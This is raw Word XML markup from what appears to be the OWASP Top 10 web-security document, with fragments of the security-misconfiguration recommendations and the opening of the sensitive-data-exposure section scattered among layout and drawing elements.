    <w:p w14:paraId="6E30BC15" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAC7427" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F0E632" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBBC076" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D366D3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1CA583" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C066BFA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D694A69" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5869E5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E36888" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542E0A4A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="054D8D68" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B367E11" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448EF6E4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA262D1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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This?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB5CB88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imar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commendat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stablis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</w:p>
    <w:p w14:paraId="5C4E17EA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following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF86159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1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peatabl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arden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k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as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</w:p>
    <w:p w14:paraId="65BB580A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eas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plo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oth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vironme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perly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D6720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lock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own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velopment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QA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duction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA1B40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environm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houl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figur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dentical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(with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29546448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differe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assword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a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vironment)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</w:p>
    <w:p w14:paraId="2597E5B7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pro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houl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utomat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inimiz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ffort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5462DD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requir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tu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new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c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vironment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736199C4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2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keep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breas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ploy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new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0254DA1C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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>softwar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update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n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patche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imely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manner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o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each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4018DA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deploy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vironment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need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clude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code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12060AEA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b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>libraries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as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well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(see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new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b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9"/>
        </w:rPr>
        <w:t>A9)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDD6175" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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3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ro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ppl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chitect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vid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ffective,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F08169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sec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par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twee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ponents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA1684E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4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Consid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unn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ca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o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udi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eriodical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</w:p>
    <w:p w14:paraId="372B61A6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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>help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detec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futur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misconfiguration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or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missing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atches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164DEF47" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E145B1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="470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4B3B7B68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</w:p>
    <w:p w14:paraId="43FA1208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4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4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evelopmen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4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4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4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4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figuration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B92A128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4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d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view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rro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andling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="733D7D14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5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figur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anagement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18F46AB8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rro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6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des</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73AED175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3"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·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A6331"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP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A6331"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Top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A6331"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10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A6331"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2004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A6331"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-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hyperlink r:id="rId369" w:history="1">
        <w:r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Insecure</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId370" w:history="1">
        <w:r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Configuration</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId371" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="93"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14A673B0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dditiona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m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a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37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ASVS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50B0D5EB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId373" w:history="1">
        <w:proofErr w:type="gramStart"/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quirement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74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ea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7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76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77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figuration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78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12)</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId379" w:history="1">
        <w:r w:rsidR="00810992">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="323232"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B0B6DF1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="330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70857AA8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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C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agazin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Web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rv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ardening</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BBF8381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8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2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vironmenta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laws</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D24CB1A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I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figur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39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s/Benchmarks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="579052C0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56C37354" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="12"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="232C46B8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="7ED30A26">
          <v:shape id="_x0000_s2498" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:73.65pt;width:570pt;height:229.45pt;z-index:251668992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1D079C53" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1022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2B3C4F50" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="788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43BB6B42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80E897D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="511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30BD30F7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650C422E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="522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2253BF5F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1E15F21" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="563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3E0B30A2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4E5580CF" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="510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413B5A65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4365EB80" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="62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804E881" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="429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F587A38" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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0055C2FD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
                          <w:ind w:left="48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IFFICULT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75261523" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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5105C684" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
                          <w:ind w:left="34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UNCOMM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659DA645" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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6C00899E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
                          <w:ind w:left="5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6BAC6975" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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50569F78" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
                          <w:ind w:left="5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SEVER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630A313" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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32ECD9A2" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241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678EA02F" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="234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8086A90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</w:p>
                      <w:p w14:paraId="35ECE0B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a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5B75B47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siti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</w:p>
                      <w:p w14:paraId="4D99B105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ackup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</w:p>
                      <w:p w14:paraId="1C28DA9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es</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6656C186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s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</w:p>
                      <w:p w14:paraId="294B1663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ansi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</w:p>
                      <w:p w14:paraId="40A68C3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ustomers’</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="505EC372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e</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5E7CCA99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ot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ter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</w:p>
                      <w:p w14:paraId="747535C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r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reat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F9D3091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ypically</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5C5D0EB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n’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ea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rypto</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7909FC09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rectly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eak</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0F16CDA6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th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lse,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="78DC0DD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te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eys,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2D0B6485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-in-the-</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="291C0860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ddl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337A1E59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te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lea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x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</w:p>
                      <w:p w14:paraId="6EEAFD2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rv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ile</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="47FE52DA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ansi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om</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="02BD49F1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’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2CA66BD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m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mp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ot</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="19D41F6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ncryp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siti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ryp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79C497FD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mployed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a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ener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</w:p>
                      <w:p w14:paraId="0607B741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agemen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a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gorith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age</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="710DF34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mon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ticular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a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ssword</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3F3AF39D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sh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chnique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aknesses</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="53A09B96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er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m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s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t</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="537DA34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r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lo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ar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cale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ternal</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="15ECE5A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fficult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rver</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3C3421B9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d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imi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y</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="36FE840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ual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r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loit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D1D02B9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ailu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equently</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3CFE53C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romis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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="03E14B65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hould</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="75162174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v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en</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6D0E4F15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tected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ypically,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="58FCC0D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formation</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="737F5E82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sitive</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="78598FF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ealth</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1EF508EB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cord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redentials,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3963E189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erso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,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="47D0072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red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rd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tc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2AF60D3" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274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6D224994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576DA52E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o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</w:p>
                      <w:p w14:paraId="2466BDA3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a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1485ED96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putation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70F83F06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eg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iabilit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f</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7E96B778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7709852E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osed?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</w:p>
                      <w:p w14:paraId="43472907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1BFDBA00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ma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6FD55E46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putation.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="65A4158C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01394939">
          <v:shape id="imagerId398" o:spid="_x0000_s2497" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251855360;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId398" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0DBAB51A">
          <v:shape id="imagerId399" o:spid="_x0000_s2496" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251854336;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId399" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4EC24C0F">
          <v:shape id="imagerId400" o:spid="_x0000_s2495" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251853312;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId400" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0EECC7D6">
          <v:shape id="imagerId401" o:spid="_x0000_s2494" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251848192;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId401" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2CBB1996">
          <v:shape id="imagerId402" o:spid="_x0000_s2493" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251847168;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId402" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="20D155DA">
          <v:shape id="imagerId403" o:spid="_x0000_s2492" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251852288;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId403" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="19D7552E">
          <v:shape id="imagerId404" o:spid="_x0000_s2491" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251851264;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId404" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="74EB7609">
          <v:shape id="imagerId405" o:spid="_x0000_s2490" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251850240;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId405" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="081C3D8B">
          <v:shape id="imagerId406" o:spid="_x0000_s2489" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251849216;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId406" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3E71C427">
          <v:shapetype id="_x0000_m2488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D7EF106">
          <v:shape id="_x0000_s2487" type="#_x0000_m2488" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25187481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9F13962">
          <v:shapetype id="_x0000_m2486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6336C5F">
          <v:shape id="_x0000_s2485" type="#_x0000_m2486" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124.25pt;width:543pt;height:3pt;z-index:25167001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6DD15772">
          <v:shapetype id="_x0000_m2484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148F93">
          <v:shape id="_x0000_s2483" type="#_x0000_m2484" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.45pt;width:543pt;height:3pt;z-index:25167104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6D4C841">
          <v:shapetype id="_x0000_m2482" coordsize="600,20548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C1334E2">
          <v:shape id="_x0000_s2481" type="#_x0000_m2482" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:71.65pt;width:6pt;height:205.45pt;z-index:25167206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7E0C90D">
          <v:shapetype id="_x0000_m2480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58DB071">
          <v:shape id="_x0000_s2479" type="#_x0000_m2480" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.15pt;width:543pt;height:3pt;z-index:25167308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7B6CC26">
          <v:shapetype id="_x0000_m2478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AC29343">
          <v:shape id="_x0000_s2477" type="#_x0000_m2478" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:272.65pt;width:543pt;height:3pt;z-index:25167411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59859CB">
          <v:shapetype id="_x0000_m2476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0B97C51">
          <v:shape id="_x0000_s2475" type="#_x0000_m2476" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25187379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36E2F26A">
          <v:shapetype id="polygon179" o:spid="_x0000_m2474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B7A8ED2">
          <v:shape id="WS_polygon179" o:spid="_x0000_s2473" type="#polygon179" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-25187276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67C5DE9C">
          <v:shapetype id="polygon180" o:spid="_x0000_m2472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CF9FC16">
          <v:shape id="WS_polygon180" o:spid="_x0000_s2471" type="#polygon180" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251871744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0D48A3AC">
          <v:shapetype id="polygon220" o:spid="_x0000_m2470" coordsize="2178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6BBC27F">
          <v:shape id="WS_polygon220" o:spid="_x0000_s2469" type="#polygon220" style="position:absolute;left:0;text-align:left;margin-left:23.25pt;margin-top:496.2pt;width:217.8pt;height:.6pt;z-index:-25187072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C2140C6">
          <v:shapetype id="_x0000_m2468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2BEE671">
          <v:shape id="_x0000_s2467" type="#_x0000_m2468" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25186969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09B2FD9">
          <v:shapetype id="_x0000_m2466" coordsize="2232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879DE2">
          <v:shape id="_x0000_s2465" type="#_x0000_m2466" style="position:absolute;left:0;text-align:left;margin-left:280.8pt;margin-top:552.2pt;width:223.2pt;height:.6pt;z-index:-2518686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9C0AFDB">
          <v:shapetype id="polygon239" o:spid="_x0000_m2464" coordsize="127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0274CB7">
          <v:shape id="WS_polygon239" o:spid="_x0000_s2463" type="#polygon239" style="position:absolute;left:0;text-align:left;margin-left:280.8pt;margin-top:562.2pt;width:127.3pt;height:.55pt;z-index:-2518676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EB6A806">
          <v:shapetype id="polygon244" o:spid="_x0000_m2462" coordsize="175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058DA14">
          <v:shape id="WS_polygon244" o:spid="_x0000_s2461" type="#polygon244" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:578.15pt;width:175.3pt;height:.6pt;z-index:-2518666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BB308B5">
          <v:shapetype id="_x0000_m2460" coordsize="156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E61E09F">
          <v:shape id="_x0000_s2459" type="#_x0000_m2460" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:594.2pt;width:156.7pt;height:.6pt;z-index:-2518656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BF2F792">
          <v:shapetype id="polygon254" o:spid="_x0000_m2458" coordsize="193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1084A4">
          <v:shape id="WS_polygon254" o:spid="_x0000_s2457" type="#polygon254" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:610.2pt;width:193.3pt;height:.55pt;z-index:-2518645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BBD50EE">
          <v:shapetype id="polygon261" o:spid="_x0000_m2456" coordsize="2037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8D6B3FF">
          <v:shape id="WS_polygon261" o:spid="_x0000_s2455" type="#polygon261" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:626.15pt;width:203.75pt;height:.6pt;z-index:-25186355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FC40917">
          <v:shapetype id="polygon268" o:spid="_x0000_m2454" coordsize="1592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E9D8DD3">
          <v:shape id="WS_polygon268" o:spid="_x0000_s2453" type="#polygon268" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:658.2pt;width:159.2pt;height:.55pt;z-index:-25186252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D56A2A7">
          <v:shapetype id="polygon273" o:spid="_x0000_m2452" coordsize="245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FAADA0E">
          <v:shape id="WS_polygon273" o:spid="_x0000_s2451" type="#polygon273" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:674.15pt;width:245.5pt;height:.6pt;z-index:-25186150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87C0874">
          <v:shapetype id="polygon278" o:spid="_x0000_m2450" coordsize="2163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5D1AE9">
          <v:shape id="WS_polygon278" o:spid="_x0000_s2449" type="#polygon278" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:690.2pt;width:216.35pt;height:.6pt;z-index:-25186048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3DE5581">
          <v:shapetype id="polygon286" o:spid="_x0000_m2448" coordsize="144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3830F2D">
          <v:shape id="WS_polygon286" o:spid="_x0000_s2447" type="#polygon286" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:716.15pt;width:144.7pt;height:.55pt;z-index:-25185945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5EA1EF8">
          <v:shapetype id="polygon288" o:spid="_x0000_m2446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B2DFF7">
          <v:shape id="WS_polygon288" o:spid="_x0000_s2445" type="#polygon288" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-25185843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646F8B2">
          <v:shapetype id="polygon289" o:spid="_x0000_m2444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BBFA925">
